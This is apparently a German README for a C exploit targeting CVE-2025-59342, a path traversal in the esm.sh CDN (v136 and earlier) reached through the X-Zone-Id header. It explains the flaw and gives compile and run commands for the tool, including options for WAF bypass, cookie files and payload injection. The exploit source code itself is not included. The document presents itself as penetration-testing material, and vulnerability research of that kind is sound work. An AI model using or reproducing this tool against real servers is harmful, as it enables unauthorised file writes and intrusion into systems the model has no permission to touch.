
C-Exploit für CVE-2025-59342 Path Traversal im esm.sh CDN (v136 und früher). Injiziert Payloads über den X-Zone-Id-Header mit WAF-Bypass und Cookie-Unterstützung für Penetrationstests.
Autor: Byte Reaper
CVE-2025-59342 ist eine Path-Traversal-Schwachstelle in esm.sh, einem nobuild Content Delivery Network (CDN) für moderne Webentwicklung, in Version 136 und früher.
Das Problem liegt in der Handhabung des X-Zone-Id HTTP-Headers, der zur Konstruktion eines Dateisystempfads verwendet wird. Der Header-Wert wird nicht ordnungsgemäß kanonisiert oder auf das Basisverzeichnis des Anwendungsspeichers beschränkt.
Infolgedessen kann die Angabe von ../-Sequenzen in X-Zone-Id dazu führen, dass Dateien außerhalb des vorgesehenen Speicherorts geschrieben werden.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl
./CVE-2025-59342 -u http://target (auto port = 80)
- Verbose Mode :
./CVE-2025-59342 -u http://target -v
- Bypass WAF :
./CVE-2025-59342 -u http://target -v -b
- Cookies FILE :
./CVE-2025-59342 -u http://target -c [FILE] -v
- Target Port server :
./CVE-2025-59342 -u http://target -p [PORT]
- Payload :
./CVE-2025-59342 -u http://target -p [Payload injection]
MIT